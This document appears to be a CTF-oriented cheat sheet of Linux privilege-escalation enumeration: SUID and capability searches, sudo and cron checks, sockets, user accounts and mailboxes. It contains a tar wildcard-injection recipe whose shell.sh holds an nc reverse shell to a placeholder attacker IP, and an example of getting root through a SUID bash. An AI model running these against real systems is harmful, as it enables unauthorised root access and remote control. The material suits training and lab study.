
# Linux Enumeration Techniques for PrivEsc

## Investigation of sudo privileges for the current user

```bash
sudo -l
```
## Investigation of the current user's cron jobs

```bash
crontab -l
```

## `find` command

### Finding SUID files

```bash
find / -perm -u=s -type f 2>/dev/null
```

**NOTE**: *enlightenment_sys* is a famous vulnerable SUID binary and is commonly found in CTFs.

**NOTE**: If a "bash" ELF file has SUID bit set, then run with `-p` option **to ensure that the permissions are retained**.

```bash
-rwsr-sr-x 1 root  root  1113504 Jul 22  2020 .suid_bash

# Running suid_bash without -p

./.suid_bash

.suid_bash-4.4$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

# Running suid_bash WITH -p

./.suid_bash -p

.suid_bash-4.4# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(james)

.suid_bash-4.4# whoami
root
```

## Methodology for exploiting an uncommon ELF file that could be run with elevated privileges.

- While enumerating a system for privilege escalation, we might stumble upon an ELF file that has the `SUID` bit set or could be run as `sudo`.

- Understanding the functionality of such a binary file takes a little extra effort than a script that has the `SUID` bit set or could be run as `sudo`.

- The first step to be performed on such an executable would be to run the command `strings` on it. **The output would contain the potential commands, directory paths, print messages etc.**, utilized by the binary which would help us get an idea about its functionality.

- The second step would be to **run the executable itself (with elevated privileges)**. The output generated during the file's exceution and its operation should give us a better understanding of the file's functionality.

- It is common to find ELF files (especially the ones that deal with some sort of automation or backup task) utilize binaries such as `tar`, `7za`, etc., as part of their intended functionality. Then we should **check if the way those binaries have been utilized facilitates PrivEsc**. For e.g. the utilization of the wildcard character `*` in a `tar` command facilitates arbitrary code execution which can be achieved by running the following commands in the working directory of the tar command followed by the excution of the vulnerable ELF file containing the `tar` command.

```bash
# Contents of shell.sh : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER'S IP> 9005 >/tmp/f

echo "" > "--checkpoint-action=exec=sh shell.sh"; echo "" > --checkpoint=1

# The above commands help the tar command to run the file shell.sh after the first file is archived.
```

## Files with capabilities

```bash
getcap -r / 2> /dev/null
```

`-r` - For recursive search

## The `.env` file

Usually present in the application's root directory (or within a sub directory). May contain very useful key-value pairs like DB username, DB password etc.


## Sockets Investigation

### ss

```bash
ss -tulpn
```

`-t` - Displays TCP sockets

`-u` - Displays UDP sockets

`-l` - Displays only listening sockets

`-p` - Shows the process using the socket

`-n` - Doesn't resolve service names


## Determining the list of user accounts on the system.

```bash
ls /home
```

This step of determining the available users accounts on the system is very important. This info would be very helpful, **especially when direct privilege escalation to the `root` account isn't possible** from the current user account. So we could **try to pivot to another user account** on the system and then attempt to escalate to root.

## Check the email inboxes of users

```bash
cd /var/mail

ls -la #Lists all the users' mailbox files (if any)
```

## Discovering unknown Hostnames

```bash
cat /etc/hosts
```

This could help us **discover unknown subdomains** for already known services/applications.

